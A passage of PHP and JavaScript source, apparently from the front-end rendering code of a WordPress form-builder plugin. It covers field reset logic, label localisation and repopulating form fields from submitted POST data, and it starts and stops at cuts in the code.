        formOnload<?php echo $id ?>();
      });

      form_view_count<?php echo $id ?>=0;
      jQuery(document).ready(function () {
        for(i=1; i<=30; i++) {
          if (document.getElementById('<?php echo $id ?>form_view'+i)) {
            form_view_count<?php echo $id ?>++;
            form_view_max<?php echo $id ?> = i;
          }
        }
        if (form_view_count<?php echo $id ?> > 1) {
          for (i = 1; i <= form_view_max<?php echo $id ?>; i++) {
            if (document.getElementById('<?php echo $id ?>form_view' + i)) {
              first_form_view<?php echo $id ?> = i;
              break;
            }
          }
          generate_page_nav(first_form_view<?php echo $id ?>, '<?php echo $id ?>', form_view_count<?php echo $id ?>, form_view_max<?php echo $id ?>);
        }
      });
      function check_required<?php echo $form_id ?>(but_type) {
        if (but_type == 'reset') {
          if (window.before_reset) {
            before_reset();
          }
         var types = <?php echo json_encode($types) ?>;
			var label_ids = <?php echo json_encode($id1s) ?>;
			jQuery.each(types, function (index, elem) {
				switch(elem) {
					case "type_text":
					case "type_password":
					case "type_textarea":
					case "type_number":
					case "type_submitter_mail":	
					case "type_spinner":
					case 'type_own_select':
					case 'type_country':
					case 'type_date': 
					case 'type_hidden': 
						jQuery("#wdform_"+label_ids[index]+"_element<?php echo $id ?>").val('');
					break;
						
					case 'type_send_copy':	
						jQuery("#wdform_"+label_ids[index]+"_element<?php echo $id ?>").prop('checked', false);
					break;
					case 'type_phone':	
						jQuery("#wdform_"+label_ids[index]+"_element_first<?php echo $id ?>, #wdform_"+label_ids[index]+"_element_last<?php echo $id ?>").val('');
					break;
					
					case 'type_name':	
						jQuery("#wdform_"+label_ids[index]+"_element_first<?php echo $id ?>, #wdform_"+label_ids[index]+"_element_last<?php echo $id ?>, #wdform_"+label_ids[index]+"_element_title<?php echo $id ?>, #wdform_"+label_ids[index]+"_element_middle<?php echo $id ?>").val('');
					break;
					
					case 'type_address':
						jQuery("#wdform_"+label_ids[index]+"_street1<?php echo $id ?>, #wdform_"+label_ids[index]+"_street2<?php echo $id ?>, #wdform_"+label_ids[index]+"_city<?php echo $id ?>, #wdform_"+label_ids[index]+"_state<?php echo $id ?>, #wdform_"+label_ids[index]+"_postal<?php echo $id ?>, #wdform_"+label_ids[index]+"_country<?php echo $id ?>").val('');
					break;
					
					case 'type_checkbox':
						jQuery("#form<?php echo $id ?> div[wdid='"+label_ids[index]+"'] .checkbox-div input").prop('checked', false);
						jQuery("#wdform_"+label_ids[index]+"_other_br<?php echo $id ?>").remove();
						jQuery("#wdform_"+label_ids[index]+"_other_input<?php echo $id ?>").remove();
					break;
					
					case 'type_radio':
						jQuery("#form<?php echo $id ?> div[wdid='"+label_ids[index]+"'] .radio-div input").prop('checked', false);
						jQuery("#wdform_"+label_ids[index]+"_other_br<?php echo $id ?>").remove();
						jQuery("#wdform_"+label_ids[index]+"_other_input<?php echo $id ?>").remove();
					break;
           
					case 'type_time':
						jQuery("#wdform_"+label_ids[index]+"_hh<?php echo $id ?>, #wdform_"+label_ids[index]+"_mm<?php echo $id ?>, #wdform_"+label_ids[index]+"_ss<?php echo $id ?>, #wdform_"+label_ids[index]+"_am_pm<?php echo $id ?>").val('');
					break;
            
					case 'type_date_fields': 
						jQuery("#wdform_"+label_ids[index]+"_day<?php echo $id ?>, #wdform_"+label_ids[index]+"_month<?php echo $id ?>, #wdform_"+label_ids[index]+"_year<?php echo $id ?>").val('');
					break;

					case 'type_file_upload':
						jQuery("#wdform_"+label_ids[index]+"_element<?php echo $id ?>_save").remove();
					break;
            
					case 'type_paypal_price': 
						jQuery("#wdform_"+label_ids[index]+"_element_dollars<?php echo $id ?>, #wdform_"+label_ids[index]+"_element_cents<?php echo $id ?>").val('');
					break;
            
					case 'type_paypal_select': 
						jQuery("#wdform_"+label_ids[index]+"_element<?php echo $id ?>, #wdform_"+label_ids[index]+"_element_quantity<?php echo $id ?>, #form<?php echo $id ?> div[wdid='"+label_ids[index]+"'] .paypal-property select").val('');
					break;
					
					case 'type_paypal_radio': 
						jQuery("#wdform_"+label_ids[index]+"_element_quantity<?php echo $id ?>,#form<?php echo $id ?> div[wdid='"+label_ids[index]+"'] .paypal-property select").val('');
						jQuery("#form<?php echo $id ?> div[wdid='"+label_ids[index]+"'] .radio-div input").prop('checked', false);
					break;
					
					case 'type_paypal_shipping':
						jQuery("#form<?php echo $id ?> div[wdid='"+label_ids[index]+"'] .radio-div input").prop('checked', false);
					break;
            
					case 'type_paypal_checkbox':
						jQuery("#wdform_"+label_ids[index]+"_element_quantity<?php echo $id ?>,#form<?php echo $id ?> div[wdid='"+label_ids[index]+"'] .paypal-property select").val('');
						jQuery("#form<?php echo $id ?> div[wdid='"+label_ids[index]+"'] .checkbox-div input").prop('checked', false);
					break;
				
					case 'type_star_rating': 
						jQuery("#wdform_"+label_ids[index]+"_selected_star_amount<?php echo $id ?>").val('');
						jQuery("#wdform_"+label_ids[index]+"_element<?php echo $id ?> img").attr('src', plugin_url+'/images/star.png');
					break;
					
					case 'type_scale_rating': 
						jQuery("#form<?php echo $id ?> div[wdid='"+label_ids[index]+"'] .radio-div input").prop('checked', false);
					break;	

					case 'type_slider':
						jQuery("#wdform_"+label_ids[index]+"_element<?php echo $id ?>").slider({
							value: eval(0),
						});
						jQuery("#wdform_"+label_ids[index]+"_element_value<?php echo $id ?>").html('0');
					break;	
					
					case 'type_range':
						jQuery("#wdform_"+label_ids[index]+"_element<?php echo $id ?>0, #wdform_"+label_ids[index]+"_element<?php echo $id ?>1").val('');					
					break;	
					
					case 'type_grading': 
						jQuery("#wdform_"+label_ids[index]+"_element<?php echo $id ?> input").val('');
					break;
					
					case 'type_matrix':
						jQuery("#wdform_"+label_ids[index]+"_element<?php echo $id ?> .radio-div input").prop('checked', false);
						jQuery("#wdform_"+label_ids[index]+"_element<?php echo $id ?> .checkbox-div input").prop('checked', false);
						jQuery("#wdform_"+label_ids[index]+"_element<?php echo $id ?> input[type='text']").val('');
						jQuery("#wdform_"+label_ids[index]+"_element<?php echo $id ?> select").val('');
					break;
					
					case 'type_paypal_total': 
						jQuery("#wdform_"+label_ids[index]+"div_total<?php echo $id ?>").html('$0');	
						jQuery("#wdform_"+label_ids[index]+"paypal_products<?php echo $id ?>").empty();	
					break;	
					default:
					break;
				}
			});
			
          return;
        }
        if (window.before_submit) {
          before_submit();
        }
        x = jQuery("#form<?php echo $form_id; ?>");
        <?php echo $check_js; ?>;
        var a = [];
        if (typeof a[<?php echo $form_id ?>] !== 'undefined' && a[<?php echo $form_id ?>] == 1) {
          return;
        }
        <?php echo $onsubmit_js; ?>;
        a[<?php echo $form_id ?>] = 1;
        document.getElementById("form"+<?php echo $form_id ?>).submit();
      }
      function check<?php echo $form_id ?>(id) {
        x = jQuery("#<?php echo $form_id ?>form_view"+id);
        <?php echo $check_js; ?>;
        return true;
      }
    </script>
    <?php
    }
    else {
      $captcha_url = 'components/com_formmaker/wd_captcha.php?digit=';
      $captcha_rep_url = 'components/com_formmaker/wd_captcha.php?r2=' . mt_rand(0, 1000) . '&digit=';
      $rep1 = array(
        "<!--repstart-->Title<!--repend-->",
        "<!--repstart-->First<!--repend-->",
        "<!--repstart-->Last<!--repend-->",
        "<!--repstart-->Middle<!--repend-->",
        "<!--repstart-->January<!--repend-->",
        "<!--repstart-->February<!--repend-->",
        "<!--repstart-->March<!--repend-->",
        "<!--repstart-->April<!--repend-->",
        "<!--repstart-->May<!--repend-->",
        "<!--repstart-->June<!--repend-->",
        "<!--repstart-->July<!--repend-->",
        "<!--repstart-->August<!--repend-->",
        "<!--repstart-->September<!--repend-->",
        "<!--repstart-->October<!--repend-->",
        "<!--repstart-->November<!--repend-->",
        "<!--repstart-->December<!--repend-->",
        "<!--repstart-->Street Address<!--repend-->",
        "<!--repstart-->Street Address Line 2<!--repend-->",
        "<!--repstart-->City<!--repend-->",
        "<!--repstart-->State / Province / Region<!--repend-->",
        "<!--repstart-->Postal / Zip Code<!--repend-->",
        "<!--repstart-->Country<!--repend-->",
        "<!--repstart-->Area Code<!--repend-->",
        "<!--repstart-->Phone Number<!--repend-->",
        "<!--repstart-->Dollars<!--repend-->",
        "<!--repstart-->Cents<!--repend-->",
        "<!--repstart-->&nbsp;$&nbsp;<!--repend-->",
        "<!--repstart-->Quantity<!--repend-->",
        "<!--repstart-->From<!--repend-->",				
        "<!--repstart-->To<!--repend-->",
        "<!--repstart-->$300<!--repend-->",
        "<!--repstart-->product 1 $100<!--repend-->",
        "<!--repstart-->product 2 $200<!--repend-->",
        $captcha_url,
        'class="captcha_img"',
        plugins_url("images/refresh.png", __FILE__),
        'form_id_temp',
        'style="padding-right:170px"'
      );
      $rep2 = array(
        addslashes(__("Title", 'form_maker')),
        addslashes(__("First", 'form_maker')),
        addslashes(__("Last", 'form_maker')),
        addslashes(__("Middle", 'form_maker')),
        addslashes(__("January", 'form_maker')),
        addslashes(__("February", 'form_maker')),
        addslashes(__("March", 'form_maker')),
        addslashes(__("April", 'form_maker')),
        addslashes(__("May", 'form_maker')),
        addslashes(__("June", 'form_maker')),
        addslashes(__("July", 'form_maker')),
        addslashes(__("August", 'form_maker')),
        addslashes(__("September", 'form_maker')),
        addslashes(__("October", 'form_maker')),
        addslashes(__("November", 'form_maker')),
        addslashes(__("December", 'form_maker')),
        addslashes(__("Street Address", 'form_maker')),
        addslashes(__("Street Address Line 2", 'form_maker')),
        addslashes(__("City", 'form_maker')),
        addslashes(__("State / Province / Region", 'form_maker')),
        addslashes(__("Postal / Zip Code", 'form_maker')),
        addslashes(__("Country", 'form_maker')),
        addslashes(__("Area Code", 'form_maker')),
        addslashes(__("Phone Number", 'form_maker')),
        addslashes(__("Dollars", 'form_maker')),
        addslashes(__("Cents", 'form_maker')),
        '&nbsp;' . $form_currency . '&nbsp;',
        addslashes(__("Quantity", 'form_maker')),
        addslashes(__("From", 'form_maker')),
        addslashes(__("To", 'form_maker')),
        '',
        '',
        '',
        $captcha_rep_url,
        'class="captcha_img" style="display:none"',
        plugins_url("images/refresh.png", __FILE__),
        $id,
        ''
      );
      $untilupload = str_replace($rep1, $rep2, $row->form_front);
      while (strpos($untilupload, "***destinationskizb") > 0) {
        $pos1 = strpos($untilupload, "***destinationskizb");
        $pos2 = strpos($untilupload, "***destinationverj");
        $untilupload = str_replace(substr($untilupload, $pos1, $pos2 - $pos1 + 22), "", $untilupload);
      }
      $form_maker_front_end .= $untilupload;
      $is_recaptcha = FALSE;
      $form_maker_front_end .= '<script type="text/javascript">';
      $form_maker_front_end .= 'WDF_FILE_TYPE_ERROR = \'' . addslashes(__("Sorry, you are not allowed to upload this type of file.", 'form_maker')) . '\';';
      $form_maker_front_end .= 'WDF_GRADING_TEXT = \'' . addslashes(__("Your score should be less than", 'form_maker')) . '\';';
      $form_maker_front_end .= 'WDF_INVALID_GRADING_' . $id . ' 	= \'' . addslashes(sprintf(__("Your score should be less than", 'form_maker'), '`grading_label`', '`grading_total`')) . '\';';
      $form_maker_front_end .= 'WDF_INVALID_EMAIL = \'' . addslashes(__("This is not a valid email address.", 'form_maker')) . '\';';
      $form_maker_front_end .= 'REQUEST_URI_' . $id . '	= "' . $current_url . '";';
      $form_maker_front_end .= 'ReqFieldMsg_' . $id . '	=\'`FIELDNAME` ' . addslashes(__('field is required.', 'form_maker')) . '\';';
      $form_maker_front_end .= 'RangeFieldMsg_' . $id . '	=\'' . addslashes(__('The', 'form_maker')) . ' `FIELDNAME` ' . addslashes(__('value must be between', 'form_maker')) . ' `FROM` - `TO`\';';
      $form_maker_front_end .= 'FormCurrency_' . $id . ' = "' . $form_currency . '";';
      $form_maker_front_end .= 'FormPaypalTax_' . $id . ' = ' . $form_paypal_tax . ';';
      $form_maker_front_end .= 'function formOnload' . $id . '()
  {';
      foreach ($label_type as $key => $type) {
        switch ($type) {
          case 'type_map':
            $form_maker_front_end .= 'if(document.getElementById("' . $label_id[$key] . '_element' . $id . '"))
      {
        if_gmap_init(' . $label_id[$key] . ',' . $id . ');
        for(q=0; q<20; q++)
          if(document.getElementById(' . $label_id[$key] . '+"_element"+' . $id . ').getAttribute("long"+q))
          {
          
            w_long=parseFloat(document.getElementById(' . $label_id[$key] . '+"_element"+' . $id . ').getAttribute("long"+q));
            w_lat=parseFloat(document.getElementById(' . $label_id[$key] . '+"_element"+' . $id . ').getAttribute("lat"+q));
            w_info=parseFloat(document.getElementById(' . $label_id[$key] . '+"_element"+' . $id . ').getAttribute("info"+q));
            add_marker_on_map(' . $label_id[$key] . ',q, w_long, w_lat, w_info,' . $id . ',false);
          }
      }';
            break;
          case 'type_mark_map':
            $form_maker_front_end .= 'if(document.getElementById("' . $label_id[$key] . '_element' . $id . '"))
    if(!document.getElementById("' . $label_id[$key] . '_long' . $id . '"))	
    {      	
    
      var longit = document.createElement(\'input\');
            longit.setAttribute("type", \'hidden\');
            longit.setAttribute("id", \'' . $label_id[$key] . '_long' . $id . '\');
            longit.setAttribute("name", \'' . $label_id[$key] . '_long' . $id . '\');

      var latit = document.createElement(\'input\');
            latit.setAttribute("type", \'hidden\');
            latit.setAttribute("id", \'' . $label_id[$key] . '_lat' . $id . '\');
            latit.setAttribute("name", \'' . $label_id[$key] . '_lat' . $id . '\');

      document.getElementById("' . $label_id[$key] . '_element_section' . $id . '").appendChild(longit);
      document.getElementById("' . $label_id[$key] . '_element_section' . $id . '").appendChild(latit);
    
      if_gmap_init(' . $label_id[$key] . ', ' . $id . ');
      
      w_long=parseFloat(document.getElementById(' . $label_id[$key] . '+"_element"+' . $id . ').getAttribute("long0"));
      w_lat=parseFloat(document.getElementById(' . $label_id[$key] . '+"_element"+' . $id . ').getAttribute("lat0"));
      w_info=parseFloat(document.getElementById(' . $label_id[$key] . '+"_element"+' . $id . ').getAttribute("info0"));
      
      
      longit.value=w_long;
      latit.value=w_lat;
      add_marker_on_map(' . $label_id[$key] . ',0, w_long, w_lat, w_info, ' . $id . ', true);		
    }';
            break;
          case 'type_captcha':
            $form_maker_front_end .= 'if(document.getElementById(\'_wd_captcha' . $id . '\'))
      captcha_refresh(\'_wd_captcha\', \'' . $id . '\');';
            break;
          case 'type_recaptcha':
            $is_recaptcha = TRUE;
            break;
          case 'type_radio':
          case 'type_checkbox':
            $form_maker_front_end .= 'if(document.getElementById(\'' . $label_id[$key] . '_randomize' . $id . '\'))
      if (document.getElementById(\'' . $label_id[$key] . '_randomize' . $id . '\').value == "yes") {
        choises_randomize(\'' . $label_id[$key] . '\', \'' . $id . '\');}';
            break;
          case 'type_spinner':
            $form_maker_front_end .= '
      if (document.getElementById(\'' . $label_id[$key] . '_element' . $id . '\')) {
        var spinner_value = document.getElementById(\'' . $label_id[$key] . '_element' . $id . '\').getAttribute(\'aria-valuenow\');
      }
      if (document.getElementById(\'' . $label_id[$key] . '_min_value' . $id . '\'))
        var spinner_min_value = document.getElementById(\'' . $label_id[$key] . '_min_value' . $id . '\').value;
      if (document.getElementById(\'' . $label_id[$key] . '_max_value' . $id . '\'))
        var spinner_max_value = document.getElementById(\'' . $label_id[$key] . '_max_value' . $id . '\').value;
      if (document.getElementById(\'' . $label_id[$key] . '_step' . $id . '\'))
        var spinner_step = document.getElementById(\'' . $label_id[$key] . '_step' . $id . '\').value;
      jQuery( \'' . $label_id[$key] . '_element' . $id . '\' ).removeClass( \'ui-spinner-input\')
      .attr( \'disabled\', false )
      .removeAttr( \'autocomplete\' )
      .removeAttr( \'role\' )
      .removeAttr( \'aria-valuemin\' )
      .removeAttr( \'aria-valuemax\' )
      .removeAttr( \'aria-valuenow\' );
      if (document.getElementById(\'' . $label_id[$key] . '_element' . $id . '\')) {
        span_ui= document.getElementById(\'' . $label_id[$key] . '_element' . $id . '\').parentNode;
        span_ui.parentNode.appendChild(document.getElementById(\'' . $label_id[$key] . '_element' . $id . '\'));
        span_ui.parentNode.removeChild(span_ui);
        jQuery(\'#' . $label_id[$key] . '_element' . $id . '\')[0].spin = null;
      }
      spinner = jQuery( \'#' . $label_id[$key] . '_element' . $id . '\' ).spinner();
      spinner.spinner( \'value\', spinner_value );
      jQuery( \'#' . $label_id[$key] . '_element' . $id . '\' ).spinner({ min: spinner_min_value});
      jQuery( \'#' . $label_id[$key] . '_element' . $id . '\' ).spinner({ max: spinner_max_value});
      jQuery( \'#' . $label_id[$key] . '_element' . $id . '\' ).spinner({ step: spinner_step});';
            break;
          case 'type_slider':
            $form_maker_front_end .= '
      if (document.getElementById(\'' . $label_id[$key] . '_slider_value' . $id . '\'))
        var slider_value = document.getElementById(\'' . $label_id[$key] . '_slider_value' . $id . '\').value;
      if (document.getElementById(\'' . $label_id[$key] . '_slider_min_value' . $id . '\'))
        var slider_min_value = document.getElementById(\'' . $label_id[$key] . '_slider_min_value' . $id . '\').value;
      if (document.getElementById(\'' . $label_id[$key] . '_slider_max_value' . $id . '\'))
        var slider_max_value = document.getElementById(\'' . $label_id[$key] . '_slider_max_value' . $id . '\').value;
      if (document.getElementById(\'' . $label_id[$key] . '_element_value' . $id . '\'))
        var slider_element_value = document.getElementById(\'' . $label_id[$key] . '_element_value' . $id . '\' );
      if (document.getElementById(\'' . $label_id[$key] . '_slider_value' . $id . '\'))
        var slider_value_save = document.getElementById( \'' . $label_id[$key] . '_slider_value' . $id . '\' );
      if (document.getElementById(\'' . $label_id[$key] . '_element' . $id . '\')) {
        document.getElementById(\'' . $label_id[$key] . '_element' . $id . '\').innerHTML = \'\';
        document.getElementById(\'' . $label_id[$key] . '_element' . $id . '\').removeAttribute( \'class\' );
        document.getElementById(\'' . $label_id[$key] . '_element' . $id . '\').removeAttribute( \'aria-disabled\' );
      }
      if (document.getElementById(\'' . $label_id[$key] . '_element' . $id . '\'))
        jQuery(\'#' . $label_id[$key] . '_element' . $id . '\')[0].slide = null;
      jQuery( \'#' . $label_id[$key] . '_element' . $id . '\').slider({
        range: \'min\',
        value: eval(slider_value),
        min: eval(slider_min_value),
        max: eval(slider_max_value),	
        slide: function( event, ui ) {
          slider_element_value.innerHTML = \'\' + ui.value;
          slider_value_save.value = \'\' + ui.value;
        }
      });';
            break;			
          case 'type_range':
            $form_maker_front_end .= '
      if (document.getElementById(\'' . $label_id[$key] . '_element' . $id . '0\'))
        var spinner_value0 = document.getElementById(\'' . $label_id[$key] . '_element' . $id . '0\').getAttribute( \'aria-valuenow\' );
      if (document.getElementById(\'' . $label_id[$key] . '_element' . $id . '1\'))
        var spinner_value1 = document.getElementById(\'' . $label_id[$key] . '_element' . $id . '1\').getAttribute( \'aria-valuenow\' );
      if (document.getElementById(\'' . $label_id[$key] . '_range_step' . $id . '\'))
        var spinner_step = document.getElementById(\'' . $label_id[$key] . '_range_step' . $id . '\').value;
      jQuery( \'#' . $label_id[$key] . '_element' . $id . '0\' ).removeClass( \'ui-spinner-input\' )
      .attr( \'disabled\', false )	
      .removeAttr( \'autocomplete\' )		
      .removeAttr( \'role\' )			
      .removeAttr( \'aria-valuenow\' );		
      if (document.getElementById(\'' . $label_id[$key] . '_element' . $id . '0\')) {
        span_ui= document.getElementById(\'' . $label_id[$key] . '_element' . $id . '0\').parentNode;
        span_ui.parentNode.appendChild(document.getElementById(\'' . $label_id[$key] . '_element' . $id . '0\'));
        span_ui.parentNode.removeChild(span_ui);
        jQuery(\'#' . $label_id[$key] . '_element' . $id . '0\')[0].spin = null;
      }
      spinner0 = jQuery( \'#' . $label_id[$key] . '_element' . $id . '0\' ).spinner();
      spinner0.spinner( \'value\', spinner_value0 );
      jQuery( \'#' . $label_id[$key] . '_element' . $id . '0\' ).spinner({ step: spinner_step});
      jQuery( \'#' . $label_id[$key] . '_element' . $id . '1\' ).removeClass( \'ui-spinner-input\' )
      .attr( \'disabled\', false )
      .removeAttr( \'autocomplete\' )
      .removeAttr( \'role\' )
      .removeAttr( \'aria-valuenow\' );
      if (document.getElementById(\'' . $label_id[$key] . '_element' . $id . '1\')) {
        span_ui1= document.getElementById(\'' . $label_id[$key] . '_element' . $id . '1\').parentNode;
        span_ui1.parentNode.appendChild(document.getElementById(\'' . $label_id[$key] . '_element' . $id . '1\'));
        span_ui1.parentNode.removeChild(span_ui1);
        jQuery(\'#' . $label_id[$key] . '_element' . $id . '1\')[0].spin = null;
      }
      spinner1 = jQuery( \'#' . $label_id[$key] . '_element' . $id . '1\' ).spinner();
      spinner1.spinner( \'value\', spinner_value1 );
      jQuery( \'#' . $label_id[$key] . '_element' . $id . '1\').spinner({ step: spinner_step});';
            break;
          case 'type_paypal_total':
            $form_maker_front_end .= '
      set_total_value(' . $label_id[$key] . ', ' . $id . ');';
            break;
          default:
            break;
        }
      }
      $form_maker_front_end .= '
       if (window.before_load) {
        before_load();
       }
    }';
      $form_maker_front_end .= '
        jQuery(window).load(function () {
          formOnload' . $id . '();
        });';
      if (isset($_POST["counter" . $id])) {
        $counter = esc_html($_POST["counter" . $id]);
      }
      $old_key = -1;
      if (isset($counter)) {
        foreach ($label_type as $key => $type) {
          switch ($type) {
            case "type_text":
            case "type_number":
            case "type_submitter_mail":
              {
              $form_maker_front_end .= "if(document.getElementById('" . $label_id[$key] . "_element" . $id . "'))
      if(document.getElementById('" . $label_id[$key] . "_element" . $id . "').title!='" . addslashes((isset($_POST[$label_id[$key] . "_element" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element" . $id])) : "")) . "')
      {	document.getElementById('" . $label_id[$key] . "_element" . $id . "').value='" . addslashes(isset($_POST[$label_id[$key] . "_element" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element" . $id])) : "") . "';
        document.getElementById('" . $label_id[$key] . "_element" . $id . "').className='input_active';
      }
    ";
              break;
              }
            case "type_textarea":
              {
              $order = array(
                "\r\n",
                "\n",
                "\r"
              );
              $form_maker_front_end .= "if(document.getElementById('" . $label_id[$key] . "_element" . $id . "'))
      if(document.getElementById('" . $label_id[$key] . "_element" . $id . "').title!='" . str_replace($order, '\n', addslashes(isset($_POST[$label_id[$key] . "_element" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element" . $id])) : "")) . "')
      {	document.getElementById('" . $label_id[$key] . "_element" . $id . "').innerHTML='" . str_replace($order, '\n', addslashes(isset($_POST[$label_id[$key] . "_element" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element" . $id])) : "")) . "';
        document.getElementById('" . $label_id[$key] . "_element" . $id . "').className='input_active';
      }
    ";
              break;
              }
            case "type_name":
              {
              $element_title = isset($_POST[$label_id[$key] . "_element_title" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element_title" . $id])) : "";
              if (isset($_POST[$label_id[$key] . "_element_title" . $id])) {
                $form_maker_front_end .= "if(document.getElementById('" . $label_id[$key] . "_element_first" . $id . "'))
    {
      if(document.getElementById('" . $label_id[$key] . "_element_title" . $id . "').title!='" . addslashes(isset($_POST[$label_id[$key] . "_element_title" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element_title" . $id])) : "") . "')
      {	document.getElementById('" . $label_id[$key] . "_element_title" . $id . "').value='" . addslashes(isset($_POST[$label_id[$key] . "_element_title" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element_title" . $id])) : "") . "';
        document.getElementById('" . $label_id[$key] . "_element_title" . $id . "').className='input_active';
      }
      
      if(document.getElementById('" . $label_id[$key] . "_element_first" . $id . "').title!='" . addslashes(isset($_POST[$label_id[$key] . "_element_first" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element_first" . $id])) : "") . "')
      {	document.getElementById('" . $label_id[$key] . "_element_first" . $id . "').value='" . addslashes(isset($_POST[$label_id[$key] . "_element_first" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element_first" . $id])) : "") . "';
        document.getElementById('" . $label_id[$key] . "_element_first" . $id . "').className='input_active';
      }
      
      if(document.getElementById('" . $label_id[$key] . "_element_last" . $id . "').title!='" . addslashes(isset($_POST[$label_id[$key] . "_element_last" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element_last" . $id])) : "") . "')
      {	document.getElementById('" . $label_id[$key] . "_element_last" . $id . "').value='" . addslashes(isset($_POST[$label_id[$key] . "_element_last" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element_last" . $id])) : "") . "';
        document.getElementById('" . $label_id[$key] . "_element_last" . $id . "').className='input_active';
      }
      
      if(document.getElementById('" . $label_id[$key] . "_element_middle" . $id . "').title!='" . addslashes(isset($_POST[$label_id[$key] . "_element_middle" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element_middle" . $id])) : "") . "')
      {	document.getElementById('" . $label_id[$key] . "_element_middle" . $id . "').value='" . addslashes(isset($_POST[$label_id[$key] . "_element_middle" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element_middle" . $id])) : "") . "';
        document.getElementById('" . $label_id[$key] . "_element_middle" . $id . "').className='input_active';
      }
      
    }";
              }
              else {
                $form_maker_front_end .= "if(document.getElementById('" . $label_id[$key] . "_element_first" . $id . "'))
    {
      
      if(document.getElementById('" . $label_id[$key] . "_element_first" . $id . "').title!='" . addslashes(isset($_POST[$label_id[$key] . "_element_first" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element_first" . $id])) : "") . "')
      {	document.getElementById('" . $label_id[$key] . "_element_first" . $id . "').value='" . addslashes(isset($_POST[$label_id[$key] . "_element_first" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element_first" . $id])) : "") . "';
        document.getElementById('" . $label_id[$key] . "_element_first" . $id . "').className='input_active';
      }
      
      if(document.getElementById('" . $label_id[$key] . "_element_last" . $id . "').title!='" . addslashes(isset($_POST[$label_id[$key] . "_element_last" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element_last" . $id])) : "") . "')
      {	document.getElementById('" . $label_id[$key] . "_element_last" . $id . "').value='" . addslashes(isset($_POST[$label_id[$key] . "_element_last" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element_last" . $id])) : "") . "';
        document.getElementById('" . $label_id[$key] . "_element_last" . $id . "').className='input_active';
      }
      
    }";
              }
              break;
              }
            case "type_phone":
              {
              $form_maker_front_end .= "if(document.getElementById('" . $label_id[$key] . "_element_first" . $id . "'))
    {
      if(document.getElementById('" . $label_id[$key] . "_element_first" . $id . "').title!='" . addslashes(isset($_POST[$label_id[$key] . "_element_first" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element_first" . $id])) : "") . "')
      {	document.getElementById('" . $label_id[$key] . "_element_first" . $id . "').value='" . addslashes(isset($_POST[$label_id[$key] . "_element_first" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element_first" . $id])) : "") . "';
        document.getElementById('" . $label_id[$key] . "_element_first" . $id . "').className='input_active';
      }
      
      if(document.getElementById('" . $label_id[$key] . "_element_last" . $id . "').title!='" . addslashes(isset($_POST[$label_id[$key] . "_element_last" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element_last" . $id])) : "") . "')
      {	document.getElementById('" . $label_id[$key] . "_element_last" . $id . "').value='" . addslashes(isset($_POST[$label_id[$key] . "_element_last" . $id]) ? esc_html(stripslashes($_POST[$label_id[$key] . "_element_last" . $id])) : "") . "';
        document.getElementById('" . $label_id[$key] . "_element_last" . $id . "').className='input_active';
      }
    }";
              break;
              }
              
            case "type_paypal_price": {
              $form_maker_front_end .= "if(document.getElementById('".$label_id[$key]."_element_dollars".$id."'))
    {
      if(document.getElementById('".$label_id[$key]."_element_dollars".$id."').title!='".addslashes(isset($_POST[$label_id[$key]."_element_dollars".$id]) ? esc_html(stripslashes($_POST[$label_id[$key]."_element_dollars".$id])) : "")."')
      {	document.getElementById('".$label_id[$key]."_element_dollars".$id."').value='".addslashes(isset($_POST[$label_id[$key]."_element_dollars".$id]) ? esc_html(stripslashes($_POST[$label_id[$key]."_element_dollars".$id])) : "")."';
        document.getElementById('".$label_id[$key]."_element_dollars".$id."').className='input_active';
      }
      
      if(document.getElementById('".$label_id[$key]."_element_cents".$id."').title!='".addslashes(isset($_POST[$label_id[$key]."_element_cents".$id]) ? esc_html(stripslashes($_POST[$label_id[$key]."_element_cents".$id])) : "")."')
      {	document.getElementById('".$label_id[$key]."_element_cents".$id."').value='".addslashes(isset($_POST[$label_id[$key]."_element_cents".$id]) ? esc_html(stripslashes($_POST[$label_id[$key]."_element_cents".$id])) : "")."';
        document.getElementById('".$label_id[$key]."_element_cents".$id."').className='input_active';
      }
    }";
                  
                  break;
                  }
                  
                  case "type_paypal_select":{
    
                  $form_maker_front_end .= 
    "if(document.getElementById('".$label_id[$key]."_element".$id."')){
      document.getElementById('".$label_id[$key]."_element".$id."').value='".addslashes(isset($_POST[$label_id[$key]."_element".$id]) ? esc_html(stripslashes($_POST[$label_id[$key]."_element".$id])) : "")."';
    
    if(document.getElementById('".$label_id[$key]."_element_quantity".$id."'))
      document.getElementById('".$label_id[$key]."_element_quantity".$id."').value='".((isset($_POST[$label_id[$key]."_element_quantity".$id]) && ((int) $_POST[$label_id[$key]."_element_quantity".$id] >= 1)) ? addslashes($_POST[$label_id[$key]."_element_quantity".$id]) : 1)."';
      ";
      for($j=0; $j<100; $j++)
                  {
                      $element = isset($_POST[$label_id[$key]."_property".$id.$j]) ? esc_html(stripslashes($_POST[$label_id[$key]."_property".$id.$j])) : NULL;
                      if(isset($element))
                          {
                          $form_maker_front_end .= 
    "document.getElementById('".$label_id[$key]."_property".$id.$j."').value='".addslashes($element)."';
    ";
                          }
                  }
      $form_maker_front_end .= "
      }";
    
                  
                  break;
                  }
            case "type_paypal_checkbox":{
                
                $form_maker_front_end .= 
    "
    for(k=0; k<30; k++)
      if(document.getElementById('".$label_id[$key]."_element".$id."'+k))
        document.getElementById('".$label_id[$key]."_element".$id."'+k).removeAttribute('checked');
      else break;
    ";
                  for($j=0; $j<100; $j++)
                  {
